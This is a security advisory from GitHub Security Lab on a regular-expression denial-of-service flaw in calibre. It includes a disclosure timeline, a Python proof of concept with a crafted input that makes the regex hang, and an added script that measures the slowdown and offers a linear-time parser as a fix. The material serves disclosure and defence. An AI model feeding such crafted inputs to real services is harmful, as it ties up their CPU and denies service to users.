Coordinated Disclosure Timeline
- 2021-08-31: report sent to kovid@kovidgoyal.net
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed kovid@kovidgoyal.net to ask if there will be a new release of calibre and whether there will be an advisory.
- 2021-09-01: Reply from kovid@kovidgoyal.net: “calibre is released every two weeks, the next release will be on the 10th. And no I am not going to release my own advisory, it’s a DoS, there are rather a lot”
Summary
calibre contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
calibre
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions: a backtracking engine can take exponential (or high-polynomial) time to reject a crafted input string, so a short attacker-controlled input is enough to tie up the CPU.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the results of the query on calibre by following this link.
Vulnerability
The vulnerable regular expression is here.
To see that the regular expression is vulnerable, copy-paste it into a separate file as shown below:
- Run the code below with python3:
import re

# The regular expression as it appears in calibre.
reg = r'(?mu)\!\[([^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*)\]\s*\((?P<path>[^\)]*)\)'

# Crafted input: the unclosed "[" characters guarantee there is no match,
# so the engine backtracks through the nested groups before giving up.
txt = "u![[[[[[Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z][Z]()"

for x in re.finditer(reg, txt):
    print(x.group('path'))
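As an added example (not code from the advisory or from calibre, and not calibre's actual fix), the script below parametrises the proof-of-concept string so the growth in matching time can be observed with small n, and shows a hand-written scanner that extracts the same `![alt](path)` references with a bracket counter instead of nested quantifiers. The scanner accepts any nesting depth, which goes beyond the six nested bracket levels the original expression allows; the names `build_payload`, `time_vulnerable_regex` and `find_images_linear`, and the assumption that the proof-of-concept's essential shape is "unclosed brackets followed by repeated `[Z]`", are this example's own.

```python
import re
import time

# The regular expression quoted in the advisory, unchanged.
VULNERABLE_RE = r'(?mu)\!\[([^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*(\[[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*\])*[^\]\[]*)\]\s*\((?P<path>[^\)]*)\)'


def build_payload(n, unbalanced=5):
    """Same shape as the advisory's proof-of-concept string (assumed here to be
    its essential structure): "![" plus `unbalanced` extra "[" that are never
    closed, then n copies of "[Z]", then "()".  The unclosed brackets guarantee
    that no match exists, so the engine tries every way of distributing the
    "[Z]" runs across the six nested groups before giving up."""
    return "u![" + "[" * unbalanced + "Z]" + "[Z]" * (n - 1) + "()"


def time_vulnerable_regex(n):
    """(seconds, matches) for the advisory's regex on build_payload(n).
    Keep n small: the time grows geometrically with n."""
    t0 = time.perf_counter()
    matches = list(re.finditer(VULNERABLE_RE, build_payload(n)))
    return time.perf_counter() - t0, matches


def find_images_linear(text):
    """Extract (alt, path) pairs for ![alt](path) references, allowing
    balanced nested brackets in alt to any depth.

    A depth counter replaces the nested (\\[...\\])* groups: each "![" marker
    is scanned forward exactly once, so the work per marker is bounded by
    len(text) and there is no backtracking to explode on unbalanced input."""
    results = []
    i = 0
    while True:
        start = text.find("![", i)
        if start == -1:
            return results
        i = start + 2            # resume point if this marker fails to match
        depth, j = 1, i
        while j < len(text) and depth:
            if text[j] == "[":
                depth += 1
            elif text[j] == "]":
                depth -= 1
            j += 1
        if depth:                # ran off the end: unbalanced, no match here
            continue
        alt = text[start + 2:j - 1]
        k = j
        while k < len(text) and text[k].isspace():   # the regex's \s*
            k += 1
        if k >= len(text) or text[k] != "(":
            continue
        close = text.find(")", k + 1)  # path is [^\)]*: up to the first ")"
        if close == -1:
            continue
        results.append((alt, text[k + 1:close]))
        i = close + 1


if __name__ == "__main__":
    # Growth check on small inputs only; raise n one step at a time.
    for n in (4, 6, 8):
        secs, _ = time_vulnerable_regex(n)
        print(f"n={n:2d}  vulnerable regex: {secs:.3f}s")
    t0 = time.perf_counter()
    print("scanner on n=32 payload:", find_images_linear(build_payload(32)),
          f"in {time.perf_counter() - t0:.6f}s")
    print(find_images_linear("see ![a [b [c]] d](img/x.png) and ![e] (y.png)."))
```

The scanner is one possible replacement; the general point is that nested `(\[...\])*` groups over overlapping character classes give the engine many equivalent ways to consume the same bracket run, and any mitigation has to remove that ambiguity (a counter, a non-backtracking engine, or an input length limit) rather than merely tweak the pattern.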
Impact
This issue may lead to a denial of service: a crafted input string of modest length makes the regular expression engine backtrack for an effectively unbounded time, so processing such an input hangs the calling thread and consumes CPU until it is killed.
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-112 in any communication regarding this issue.